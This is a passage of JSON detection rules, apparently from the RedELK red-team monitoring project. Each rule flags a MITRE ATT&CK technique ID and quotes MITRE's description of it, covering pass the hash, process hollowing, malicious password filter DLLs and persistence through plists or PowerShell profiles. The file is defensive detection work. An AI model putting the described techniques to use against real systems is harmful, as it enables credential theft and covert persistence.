ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1502","name":"Parent PID Spoofing","id":"T1502"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1502","name":"Parent PID Spoofing","id":"T1502"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1075","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1075] Pass the Hash","query":"threat.technique.id: T1075","references":["https://attack.mitre.org/techniques/T1075","https://attack.mitre.org/techniques/T1550/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1075","name":"Pass the Hash","id":"T1075"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\nIn this technique, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.[1][2]\nSilver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).[1]\nGolden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1097","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1097] Pass the Ticket","query":"threat.technique.id: T1097","references":["https://attack.mitre.org/techniques/T1097","https://attack.mitre.org/techniques/T1550/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1097","name":"Pass the Ticket","id":"T1097"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1174","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1174] Password Filter DLL","query":"threat.technique.id: T1174","references":["https://attack.mitre.org/techniques/T1174","https://attack.mitre.org/techniques/T1556/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1174","name":"Password Filter DLL","id":"T1174"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Password Policy Discovery","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1201","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1201] Password Policy Discovery","query":"threat.technique.id: T1201","references":["https://attack.mitre.org/techniques/T1201"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1201","name":"Password Policy Discovery","id":"T1201"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Path Interception","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1034","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1034] Path Interception","query":"threat.technique.id: T1034","references":["https://attack.mitre.org/techniques/T1034","https://attack.mitre.org/techniques/T1574"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1034","name":"Path Interception","id":"T1034"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1034","name":"Path Interception","id":"T1034"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1120","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1120] Peripheral Device Discovery","query":"threat.technique.id: T1120","references":["https://attack.mitre.org/techniques/T1120"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1120","name":"Peripheral Device Discovery","id":"T1120"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1069","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1069] Permission Groups Discovery","query":"threat.technique.id: T1069","references":["https://attack.mitre.org/techniques/T1069"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1069","name":"Permission Groups Discovery","id":"T1069"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges).\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.[1]\nA specific plist used for execution at login is com.apple.loginitems.plist.[2] Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.[3] Users have direct control over login items installed using a shared file list which are also visible in System Preferences [3]. Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in [4] [5]. The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like AppleScript can do this as well. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1150","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1150] Plist Modification","query":"threat.technique.id: T1150","references":["https://attack.mitre.org/techniques/T1150","https://attack.mitre.org/techniques/T1547/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r [1], is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1205","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1205] Port Knocking","query":"threat.technique.id: T1205","references":["https://attack.mitre.org/techniques/T1205"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. [1] This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. [2] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.\nThe Registry key contains entries for the following:\nLocal Port\nStandard TCP/IP Port\nUSB Monitor\nWSD Port\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1013","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1013] Port Monitors","query":"threat.technique.id: T1013","references":["https://attack.mitre.org/techniques/T1013","https://attack.mitre.org/techniques/T1547/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1013","name":"Port Monitors","id":"T1013"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1013","name":"Port Monitors","id":"T1013"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. [1] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\nA number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.[2]\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). [3][4][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1086","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1086] PowerShell","query":"threat.technique.id: T1086","references":["https://attack.mitre.org/techniques/T1086","https://attack.mitre.org/techniques/T1059/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1086","name":"PowerShell","id":"T1086"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.\nPowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. [1]\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. [2]\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1504","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1504] PowerShell Profile","query":"threat.technique.id: T1504","references":["https://attack.mitre.org/techniques/T1504","https://attack.mitre.org/techniques/T1546/013"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1504","name":"PowerShell Profile","id":"T1504"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1504","name":"PowerShell Profile","id":"T1504"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.[1] Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.[2][3]\nSome private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1145","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1145] Private Keys","query":"threat.technique.id: T1145","references":["https://attack.mitre.org/techniques/T1145","https://attack.mitre.org/techniques/T1552/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1145","name":"Private Keys","id":"T1145"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIn Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell. Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1057","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1057] Process Discovery","query":"threat.technique.id: T1057","references":["https://attack.mitre.org/techniques/T1057"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1057","name":"Process Discovery","id":"T1057"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. [1] To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. [2] To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. [3]\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. [4]\nAdversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. [4]\nProcess Doppelgänging is implemented in 4 steps [4]:\nTransact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\nLoad – Create a shared section of memory and load the malicious executable.\nRollback – Undo changes to original executable, effectively removing malicious code from the file system.\nAnimate – Create a process from the tainted section of memory and initiate execution.\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1186","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1186] Process Doppelgänging","query":"threat.technique.id: T1186","references":["https://attack.mitre.org/techniques/T1186","https://attack.mitre.org/techniques/T1055/013"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1186","name":"Process Doppelgänging","id":"T1186"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1055","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1055] Process Injection","query":"threat.technique.id: T1055","references":["https://attack.mitre.org/techniques/T1055"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1055","name":"Process Injection","id":"T1055"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1055","name":"Process Injection","id":"T1055"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.[1][2]\nThis is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1093","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1093] Process Hollowing","query":"threat.technique.id: T1093","references":["https://attack.mitre.org/techniques/T1093","https://attack.mitre.org/techniques/T1055/012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1093","name":"Process Hollowing","id":"T1093"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.[1] Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1012","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1012] Query Registry","query":"threat.technique.id: T1012","references":["https://attack.mitre.org/techniques/T1012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1012","name":"Query Registry","id":"T1012"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts [1]. In macOS and OS X, this is now a deprecated mechanism in favor of Launch Agent and Launch Daemon but is currently still used.\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1163","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1163] Rc.common","query":"threat.technique.id: T1163","references":["https://attack.mitre.org/techniques/T1163","https://attack.mitre.org/techniques/T1037/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1163","name":"Rc.common","id":"T1163"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist.\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine [1].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1164","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1164] Re-opened Applications","query":"threat.technique.id: T1164","references":["https://attack.mitre.org/techniques/T1164","https://attack.mitre.org/techniques/T1547/007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1164","name":"Re-opened Applications","id":"T1164"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Redundant 